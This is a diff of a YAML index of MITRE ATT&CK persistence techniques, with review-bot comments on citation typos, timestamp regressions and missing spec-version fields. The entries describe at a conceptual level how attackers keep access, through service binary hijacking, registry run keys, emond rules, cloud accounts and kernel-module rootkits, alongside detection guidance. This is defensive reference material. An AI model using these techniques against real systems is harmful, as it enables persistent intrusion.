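Review bot: the rewritten sentence 'Adversaries may establish persistence though modifications to host software binaries' keeps the pre-existing typo 'though' (should be 'through'); since the line is being replaced anyway, fix it in the same change. The new UNC3886 paragraph also introduces a concrete, file-level indicator (`yum-versionlock` / `versionlock.list`) that the `x_mitre_detection` text in context, which talks only about signing-certificate metadata and signature validity, does not pick up; a sentence on monitoring changes to package-manager version-lock configuration alongside binary modification would close that gap for defenders reading the index.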
@@ -32126,7 +32553,7 @@ persistence:
- Linux
- macOS
- Windows
- x_mitre_version: '2.0'
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Deletion'
- 'File: File Modification'
@@ -32141,6 +32568,11 @@ persistence:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1554
external_id: T1554
+ - source_name: Google Cloud Mandiant UNC3886 2024
+ description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+ Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+ Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+ url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
- source_name: Unit42 Banking Trojans Hooking 2022
description: 'Or Chechik. (2022, October 31). Banking Trojan Techniques: How
Financially Motivated Malware Became Infrastructure. Retrieved September
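Review bot: the new 'Google Cloud Mandiant UNC3886 2024' description begins with a leading space inside the double-quoted scalar (`" Punsaen Boonyakarn, ...`), which YAML preserves and which will show up in the rendered citation; strip it at the source. The entry otherwise follows the author-first format of its neighbours and the key matches the two '(Citation: Google Cloud Mandiant UNC3886 2024)' references added to the T1554 description above.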
@@ -32154,11 +32586,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:27:11.065Z'
name: 'Event Triggered Execution: Change Default File Association'
description: "Adversaries may establish persistence by executing malicious content
triggered by a file type association. When a file is opened, the default program
@@ -32184,7 +32615,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
@@ -32198,7 +32628,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -32225,8 +32654,8 @@ persistence:
url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
- source_name: Microsoft File Handlers
description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
- Retrieved November 13, 2014.
- url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+ Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
- source_name: Microsoft Assoc Oct 2017
description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
7, 2018.
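Review bot: the refreshed 'Microsoft File Handlers' entry now points at the learn.microsoft.com previous-versions archive with a September 2024 retrieval date, which is the right fix for the dead msdn.microsoft.com link. Since the neighbouring entry is in the touched region, the pre-existing double period in 'Plett, C. et al.. (2017, October 15). assoc.' could be cleaned in the same pass.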
@@ -32237,7 +32666,8 @@ persistence:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.001
atomic_tests: []
T1546.014:
@@ -32278,7 +32708,7 @@ persistence:
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients
, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist
.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T00:16:01.732Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Emond'
x_mitre_detection: Monitor emond rules creation by checking for files created
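Review bot: the T1546.014 description in context shows the same stripped inline-code artefact as T1547.015: `/private/var/db/emondClients` sits alone on a line, the next line begins with a comma, and 'at/System/Library/LaunchDaemons/com.apple.emond.plist' has lost the space before the path. Because the description is a block scalar, these breaks become literal newlines in the loaded value, so the conversion from upstream description markup should preserve the surrounding whitespace when it drops the delimiters. The `modified` change here (2022-05-11 to 2022-04-20) is another backwards move of the kind noted for T1546.009.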
@@ -32298,12 +32728,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.014
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -32357,11 +32786,10 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547.001:
technique:
- modified: '2023-10-16T09:08:22.319Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
description: |-
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -32448,9 +32876,9 @@ persistence:
in the Registry. Retrieved August 3, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Oddvar Moe RunOnceEx Mar 2018
description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
from Autoruns.exe. Retrieved June 29, 2018.
@@ -32463,12 +32891,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.001
atomic_tests: []
T1136.003:
technique:
- modified: '2024-03-28T16:14:28.678Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Create Account: Cloud Account'
description: |-
Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
@@ -32481,9 +32908,11 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Praetorian
- Microsoft Threat Intelligence Center (MSTIC)
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Collect usage logs from cloud user and administrator accounts
to identify unusual activity in the creation of new accounts and assignment
@@ -32492,13 +32921,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- IaaS
- - Google Workspace
- SaaS
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Creation'
type: attack-pattern
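Review bot: T1136.003's platforms change from {Azure AD, Office 365, IaaS, Google Workspace, SaaS} to {IaaS, SaaS, Office Suite, Identity Provider} with the version moving from 1.5 to 1.6, and the same consolidation is applied to T1098 in the following hunks, so the two are consistent with each other and with T1098.005 and T1098.001 above. The description in context still cites 'Microsoft Azure AD Users', which is correct because it is a reference key, but the prose of this description is not rewritten in this diff; if the Azure AD to Entra ID rename applied to T1098.005 and T1098.001 is meant to be global, check the rest of the T1136.003 description for remaining 'Azure AD' mentions.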
@@ -32546,14 +32975,11 @@ persistence:
url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.003
atomic_tests: []
T1098:
technique:
- modified: '2024-01-16T22:24:38.234Z'
+ modified: '2024-10-15T15:35:57.382Z'
name: Account Manipulation
description: "Adversaries may manipulate accounts to maintain and/or elevate
access to victim systems. Account manipulation may consist of any action that
@@ -32589,16 +33015,15 @@ persistence:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- SaaS
- Network
- Containers
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -32639,143 +33064,141 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098
atomic_tests: []
T1547.006:
technique:
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-12T17:30:54.170Z'
+ name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+ description: |-
+ Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
+
+ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+ Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+ Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+ Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
x_mitre_contributors:
- Wayne Silva, F-Secure Countercept
- Anastasios Pingios
- Jeremy Galloway
- Red Canary
- Eric Kaiser @ideologysec
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: |
+ Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+
+ On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'File: File Creation'
+ - 'File: File Modification'
+ - 'Kernel: Kernel Module Load'
+ - 'Process: Process Creation'
+ x_mitre_permissions_required:
+ - root
type: attack-pattern
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
created: '2020-01-24T17:42:23.339Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1547.006
url: https://attack.mitre.org/techniques/T1547/006
+ external_id: T1547.006
- source_name: Apple Developer Configuration Profile
- url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
September 23, 2021.
+ url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
- source_name: Apple Kernel Extension Deprecation
- url: https://developer.apple.com/support/kernel-extensions/
description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
Alternatives. Retrieved November 4, 2020.
+ url: https://developer.apple.com/support/kernel-extensions/
- source_name: System and kernel extensions in macOS
- url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
March 31, 2022.
+ url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
- source_name: GitHub Reptile
- url: https://github.com/f0rb1dd3n/Reptile
description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
April 9, 2018.
+ url: https://github.com/f0rb1dd3n/Reptile
- source_name: Volatility Phalanx2
- url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+ url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
- source_name: iDefense Rootkit Overview
- url: http://www.megasecurity.org/papers/Rootkits.pdf
description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
- April 6, 2018.
+ September 12, 2024.
+ url: https://www.megasecurity.org/papers/Rootkits.pdf
- source_name: Linux Loadable Kernel Module Insert and Remove LKMs
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
+ url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
- source_name: CrowdStrike Linux Rootkit
- url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
Retrieved December 21, 2017.
+ url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
- source_name: GitHub Diamorphine
- url: https://github.com/m0nad/Diamorphine
description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+ url: https://github.com/m0nad/Diamorphine
- source_name: Securelist Ventir
- url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
+ url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
- source_name: User Approved Kernel Extension Pike’s
- url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
Loading…. Retrieved September 23, 2021.
+ url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
- source_name: Linux Kernel Module Programming Guide
- url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
Retrieved April 6, 2018.
+ url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
- source_name: Linux Kernel Programming
- url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
Module Programming Guide. Retrieved April 6, 2018.
+ url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
- source_name: Trend Micro Skidmap
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
Retrieved June 4, 2020.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
- source_name: Purves Kextpocalypse 2
- url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
. Retrieved September 23, 2021.
+ url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
- source_name: RSAC 2015 San Francisco Patrick Wardle
- url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
Retrieved April 6, 2018.
+ url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Synack Secure Kernel Extension Broken
- url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
Extension Loading’ is Broken. Retrieved April 6, 2018.
+ url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
- source_name: Wikipedia Loadable Kernel Module
- url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
April 9, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
-
- When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
- Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
- Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
- Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
- x_mitre_detection: |
- Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
- Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
-
- On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'File: File Creation'
- - 'File: File Modification'
- - 'Kernel: Kernel Module Load'
- - 'Process: Process Creation'
- x_mitre_permissions_required:
- - root
- x_mitre_attack_spec_version: 2.1.0
+ url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.006
atomic_tests: []
T1574.013:
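Review bot: most of the changed lines in this T1547.006 block are key reordering rather than content changes, which buries the four real differences: `modified` moves from 2022-05-11 to 2024-09-12, the iDefense Rootkit Overview reference changes from `http://www.megasecurity.org/papers/Rootkits.pdf` retrieved April 6, 2018 to the `https://` URL retrieved September 12, 2024, `x_mitre_attack_spec_version` goes from 2.1.0 to 3.2.0, and `spec_version: '2.1'` is dropped. Consider having the generator emit keys in a fixed order (the previous output's order, or sorted) so regenerations diff cleanly; and since `spec_version` disappears from every object in this change, confirm nothing downstream reads it to recognise STIX 2.1 data. The `description` and `x_mitre_detection` blocks are byte-identical before and after, so they need no review.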
@@ -32812,7 +33235,7 @@ persistence:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
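Review bot: the `modified` timestamp for KernelCallbackTable (T1574.013) moves backwards, from `'2022-05-11T14:00:00.188Z'` to `'2022-03-22T15:47:33.915Z'`; the same regression appears for ROMMONkit (2021-04-29 to 2020-10-22) and IIS Components (2022-04-25 to 2021-10-17) in later hunks, while T1547.006, T1053.006 and T1078 move forward to 2024 dates. A regenerated index should not present older revisions of objects that were not changed upstream, so check that the source bundle is the intended current one and not a mix of snapshots; if the upstream object genuinely carries the earlier date, say so in the commit message so the next reviewer does not have to re-derive it.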
@@ -32838,12 +33261,10 @@ persistence:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
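Review bot: the removal of `x_mitre_attack_spec_version: 2.1.0` from T1574.013 in this hunk has no replacement line, whereas T1547.006 above receives `x_mitre_attack_spec_version: 3.2.0` when its 2.1.0 line is dropped; T1542.004 and T1505.004 lose their 2.1.0 lines the same way further down. Unless the field is re-added in a part of each object that this diff does not show, those three techniques end up with no attack spec version after regeneration, which will trip any consumer that expects the field on every object. A grep of the regenerated file for those three identifiers would settle it.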
@@ -32921,9 +33342,8 @@ persistence:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1542.004:
@@ -32950,7 +33370,7 @@ persistence:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T02:18:19.568Z'
name: ROMMONkit
description: |-
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -32972,41 +33392,10 @@ persistence:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1137.003:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
